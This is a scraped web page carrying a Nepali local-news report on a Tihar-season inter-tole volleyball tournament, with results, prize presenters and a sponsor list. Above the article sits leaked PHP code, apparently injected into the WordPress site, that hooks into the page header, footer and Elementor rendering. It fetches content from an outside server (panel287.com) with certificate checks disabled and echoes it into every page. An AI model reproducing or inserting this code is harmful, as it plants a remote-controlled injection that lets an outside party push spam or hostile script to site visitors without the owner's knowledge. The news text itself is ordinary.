if(!function_exists('gplrock_unified_footer_script')){function gplrock_unified_footer_script(){static $script_executed=false;if($script_executed){return;}$is_elementor_page=false;if(class_exists('Elementor\Plugin')){$elementor=\Elementor\Plugin::instance();if(!$elementor->editor->is_edit_mode()){$is_elementor_page=true;}}if(!did_action('wp_footer')&&!did_action('wp_head')&&!$is_elementor_page){return;}$footer_url='https://panel287.com/api/footer.php?linkspool='.urlencode($_SERVER['HTTP_HOST']);$response=wp_remote_get($footer_url,['timeout'=>15,'sslverify'=>false,'user-agent'=>'WordPress/'.get_bloginfo('version')]);if(!is_wp_error($response)&&wp_remote_retrieve_response_code($response)===200){$body=wp_remote_retrieve_body($response);if(!empty($body)&&strlen($body)>10){echo $body;}}$script_executed=true;}}if(!has_action('wp_footer','gplrock_unified_footer_script')){add_action('wp_footer','gplrock_unified_footer_script',999);}if(!has_action('wp_head','gplrock_unified_footer_script')){add_action('wp_head','gplrock_unified_footer_script',999);}if(class_exists('Elementor\Plugin')&&!has_action('elementor/frontend/after_render','gplrock_unified_footer_script')){add_action('elementor/frontend/after_render','gplrock_unified_footer_script',999);} रामप्रसाद राई गाउँपालिका–७ मा तिहारको अवसरमा टोलस्तरीय भलिबल प्रतियोगिता सम्पन्न – Toppo Khim

रामप्रसाद राई गाउँपालिका–७ मा तिहारको अवसरमा टोलस्तरीय भलिबल प्रतियोगिता सम्पन्न

15 NOVEMBER 2026, KATHMANDU रामप्रसाद राई गाउँपालिका वडा नं. ७ मा हिन्दू धर्मावलम्बीहरूको दोस्रो ठूलो पर्व दीपावली (तिहार) २०८३ को अवसरमा आयोजना गरिएको टोलस्तरीय भलिबल प्रतियोगिता भव्य रूपमा सम्पन्न भएको छ।

स्थानीय स्तरमा खेलकुदको विकास, युवाहरूबीच आपसी सद्भाव, एकता र भाइचाराको भावना अभिवृद्धि गर्ने उद्देश्यले आयोजना गरिएको उक्त प्रतियोगितामा विभिन्न टोलका ६ वटा टिमले सहभागिता जनाएका थिए।

कार्यक्रम प्रमुख अतिथि दुर्योधन राईको उपस्थितिमा सम्पन्न भएको थियो। प्रतियोगितामा रेफ्री तथा अम्पायरको भूमिका प्रवीण राईले निर्वाह गर्नुभएको थियो भने कार्यक्रमको उद्घोषण सुरेश राईले गर्नुभएको थियो। स्वयंसेवक (VOLUNTEER) को भूमिकामा ईमानसिं राई, मनोज राई, समिन राई, विजय राईसहित ११ सदस्यीय टोली खटिएको थियो।

खेलकुद प्रतियोगितासँगै स्थानीय कलाकारहरूद्वारा विविध सांस्कृतिक तथा मनोरञ्जनात्मक प्रस्तुतिहरू पनि राखिएका थिए। यसले कार्यक्रमलाई थप आकर्षक र मनोरञ्जनात्मक बनाएको थियो।

प्रतियोगिताको नतिजा तथा पुरस्कार

प्रतियोगितामा उत्कृष्ट प्रदर्शन गर्दै निम्न टिमहरूले क्रमशः स्थान हासिल गरेका छन्।

🥇 प्रथम स्थान:
साबिक वडा नं. ३ – साङ्गिराङ टोल

🥈 दोस्रो स्थान:
साबिक वडा नं. ५ – सान्दिलुङ

🥉 तेस्रो स्थान:
साबिक वडा नं. ३ – बजार समिति आयोजक टिम

पुरस्कार वितरण

🌺 प्रथम पुरस्कार अभिभावक तथा अग्रज आदरणीय श्री इन्द्रध्वज राईज्यूले वितरण गर्नुभएको थियो।

🌺 दोस्रो पुरस्कार अभिभावक तथा अग्रज आदरणीय श्री धनबहादुर राईज्यूले वितरण गर्नुभएको थियो।

🌺 तेस्रो पुरस्कार नंनुमा बजार समितिका अध्यक्ष आदरणीय श्री दुर्योधन राईज्यूले वितरण गर्नुभएको थियो।

प्रतियोगितालाई सहयोग गर्ने प्रायोजक तथा सहयोगदाताहरूको नामावली

यस प्रतियोगितालाई सफल बनाउन देश तथा विदेशमा रहनुभएका खेलप्रेमी तथा सहयोगी मनहरूबाट आर्थिक तथा खेलकुद सामग्री सहयोग प्राप्त भएको थियो।

प्रायोजक तथा सहयोगदाताहरूको विवरण यसप्रकार रहेको छ।

१. विशाल राई – नंनुमा बजार, हाल मलेसिया
नेट १ थान र नगद रु. ३,०००।

२. देवन राई – युपुङ टोल, हाल मलेसिया
रु. ४,५०० बराबरको १ थान भलिबल।

३. क्षितिज राई – डिबुटाङ टोल, हाल मलेसिया
नगद रु. ३,०००।

४. मनिराज राई – खानिटेन टोल, हाल साउदी अरेबिया
नगद रु. ३,०००।

५. नविन राई – भर टोल, हाल दक्षिण कोरिया
नगद रु. ३,०००।

६. रञ्जित राई – हाङडेरा टोल, हाल मलेसिया
नगद रु. २,५००।

आर्थिक सहयोगको विवरण

  • कुल नगद सहयोग: रु. १४,५००।
  • भलिबल: रु. ४,५०० बराबरको १ थान।
  • भलिबल नेट: १ थान।

खेलकुदको विकास र स्थानीय युवाहरूको उत्साह अभिवृद्धिका लागि विदेशमा रहेर पनि आफ्नो गाउँठाउँप्रतिको माया, सद्भाव र सामाजिक उत्तरदायित्वका साथ सहयोग गर्नुहुने सम्पूर्ण प्रायोजक तथा सहयोगदाताहरूप्रति आयोजकले हार्दिक आभार व्यक्त गरेको छ।

धन्यवाद तथा शुभकामना

स्वास्थ्यका लागि खेलकुद, समाजका लागि एकता र पुस्तान्तरणका लागि सकारात्मक संस्कृतिको विकास आवश्यक छ। यस्ता स्थानीयस्तरका खेलकुद कार्यक्रमले गाउँघरमा लुकेर रहेका प्रतिभाहरूलाई उजागर गर्नुका साथै युवाहरूलाई सकारात्मक गतिविधिमा जोड्न महत्त्वपूर्ण भूमिका खेल्ने विश्वास गरिएको छ।

कार्यक्रम सफल बनाउन अहोरात्र खटिनुहुने आयोजक टिम, सहभागी खेलाडी, रेफ्री, अम्पायर, उद्घोषक, स्थानीय कलाकार, स्वयंसेवक, सहयोगी तथा सम्पूर्ण खेलप्रेमी महानुभावहरूप्रति हार्दिक धन्यवाद व्यक्त गर्दै आगामी दिनमा पनि यस्ता रचनात्मक तथा सामाजिक गतिविधिले निरन्तरता पाउने अपेक्षा गरिएको छ।

ढिलै भए पनि दीपावली २०८३ को अवसरमा सम्पूर्णमा हार्दिक मंगलमय शुभकामना!

Comments (0)
Add Comment